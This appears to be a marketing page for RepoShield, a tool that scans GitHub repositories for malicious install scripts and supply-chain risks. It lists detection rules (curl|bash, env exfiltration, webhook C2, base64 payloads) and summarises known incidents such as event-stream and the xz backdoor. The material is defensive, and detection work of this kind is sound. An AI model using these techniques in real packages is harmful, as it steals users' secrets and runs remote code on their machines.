RepoShield
pre-execution trust · 49 signals · 7 layers

Know a repo is safe
before you npm install.

RepoShield scans GitHub repositories for malicious install scripts, hidden execution vectors, and supply-chain risks — in seconds, with zero setup, before a single line of code runs on your machine.

try:
49security checks
7detection layers
<6savg scan time
0code executed
01 · flow

How a scan works

Three surfaces. Metadata → source → dependencies. No code executes on your machine or ours during the free tier.

01
metadata

Repo fingerprint

Fetch metadata, contributor graph, release integrity, and CI workflow permissions via the GitHub API. Zero clone, zero code.

02
static analysis

AST + regex sweep

Parse source with @babel/parser and python-ast. Look for eval, child_process, env exfil, base64 payloads, and 30+ more code patterns.

03
supply chain

Dep intelligence

Cross-reference every declared + transitive dep against OSV, GHSA, typosquat index, and maintainer reputation scores.

02 · catalog

What RepoShield looks for

Four primary attack surfaces on every scan. Each finding is cited to a file + line, weighted, and explained in plain English.

7 checks

Install Script Risks

Pre/postinstall hooks, curl|bash patterns, binary drops.

  • EX-001Dangerous npm Lifecycle Scripts
  • EX-002curl | bash Patterns
  • EX-003Hidden node_modules Commit
  • EX-004Dockerfile Remote Execution
13 checks

Code Patterns

AST-level signals: eval, child_process, sensitive file reads.

  • SC-001eval() / Function() Usage
  • SC-002child_process Shell Execution
  • SC-003Dynamic require()
  • SC-004Base64 Payload Detection
7 checks

Dependencies

Known-bad packages, typosquats, fresh deps, transitive risk.

  • DP-001Known Malicious Package DB
  • DP-002Typosquatting Detection
  • DP-003Very New Dependency
  • DP-004Deep Transitive Dependency Scan
7 checks

Network Indicators

Hardcoded URLs, raw IPs, env exfil, webhook C2 channels.

  • NW-001Hardcoded URL Extraction
  • NW-002Raw IP Address Communication
  • NW-003Environment Variable Exfiltration
  • NW-005Webhook & Discord/Telegram Bots
→ see full check catalog · free vs pro vs maxx
03 · real attacks

Patterns we’ve caught in the wild

Seventy-plus real npm supply-chain incidents, condensed into detection rules. A few of the classics:

threat

event-stream (2018)

Malicious flatmap-stream injected into event-stream@3.3.6 stole bitcoin wallets.

  • DP-001 known-malicious package
  • SC-004 base64 payload
threat

xz-utils backdoor (2024)

Release tarball diverged from git source — backdoor only in distributed archive.

  • RS-006 release vs code mismatch
  • EX-005 binary executables
threat

discord-loot typosquat

Fake 'discord-loot' / 'discord.js-api' posted wallet + token theft to Discord webhooks.

  • DP-002 typosquat
  • NW-005 webhook C2
threat

postinstall curl | bash

Classic: package.json postinstall pipes a remote shell script straight to bash.

  • EX-001 lifecycle script
  • EX-002 curl | bash